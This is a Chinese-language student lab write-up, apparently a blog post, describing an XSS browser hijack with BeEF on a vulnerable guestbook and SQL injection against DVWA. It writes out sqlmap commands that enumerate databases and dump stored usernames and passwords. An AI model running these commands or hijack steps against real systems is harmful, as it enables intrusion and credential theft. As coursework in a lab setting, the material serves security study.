亞洲第一小鮮肉的第三次實驗: XSS和SQL隱碼攻擊

weixin_47015082發表於2020-12-05


前言

記錄我的第三次實驗


一、XSS部分:利用Beef劫持被攻擊者客戶端瀏覽器。

實驗環境搭建。
角色:留言簿網站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻擊者:Kali(使用beEF生成惡意程式碼,並通過留言方式提交到留言簿網站);
被攻擊者:訪問留言簿網站,瀏覽器被劫持。

1、利用AWVS掃描留言簿網站,發現其存在XSS漏洞

先將windows 2003 server網路介面卡改成NAT模式,並修改網站分配的IP地址(該IP地址為win2003的IP地址)以確保該網站能被外部連結
在這裡插入圖片描述之後複製網址並貼上進AWVS之中進行掃描
在這裡插入圖片描述紅圈即為要被掃描的網站,黑圈是掃描出來的漏洞

2、 Kali使用beef生成惡意程式碼

從終端開啟beef-xss(註冊改密碼省略不講,看的懂英文都會弄),就會看到HOOK程式碼,《IP》處為beef所處電腦的IP
在這裡插入圖片描述

3、訪問http://留言簿網站/message.asp;將以下惡意程式碼寫入網站留言板

如圖所示:
在這裡插入圖片描述

4、只要客戶端訪問這個伺服器的留言板,客戶端瀏覽器就會被劫持,指定被劫持網站為學校主頁

登入beef網站(網址可在下圖找到)
在這裡插入圖片描述在這裡插入圖片描述可以在上圖看到主機已被劫持(首先需要管理員稽核通過你的留言)

之後進行以下六步操作
在這裡插入圖片描述在第五步時修改網址,便可達到實驗目的
如圖:
在這裡插入圖片描述在這裡插入圖片描述

5、回答問題:實驗中XSS攻擊屬於哪種型別?

注入型XSS攻擊


二、SQL隱碼攻擊部分:DVWA+SQLmap+Mysql注入實戰

1、注入點發現。

首先肯定是要判斷是否有注入漏洞。 在輸入框輸入1,返回 ID: 1 First name: admin Surname: admin 返回正常;

在這裡插入圖片描述

再次輸入1',報錯,返回 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 此時可以斷定有SQL隱碼攻擊漏洞, http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

在這裡插入圖片描述

下面利用SQLMap進行注入攻擊。將DVWA安全級別設定為最低;

在這裡插入圖片描述


在進行如下操作之前,首先要獲取cookie值

在介面按下F12,並按照圖下步驟便可
在這裡插入圖片描述


2、列舉當前使用的資料庫名稱和使用者名稱

sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’ -b --current-db --current-user
(由於不可抗力被攔下來了,導致下面的實驗麼得繼續進行,不好意思哈哈哈)
在這裡插入圖片描述

3、列舉資料庫使用者名稱和密碼

sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’ --users --password

4、列舉資料庫

sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’ --dbs

5、列舉資料庫和指定資料庫的資料表

sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’–string=“Surname” -D dvwa -T users --columns

6、獲取指定資料庫和表中所有列的資訊

sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’–string=“Surname” -D dvwa -T users --columns

7、列舉指定資料表中的所有使用者名稱與密碼,並down到本地。

sqlmap語法引數:
sqlmap -u “http://【靶機IP】/dVWA/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low; PHPSESSID=【瀏覽器cookie】’–string=“Surname” -D dvwa -T users -C user,password --dump

相關文章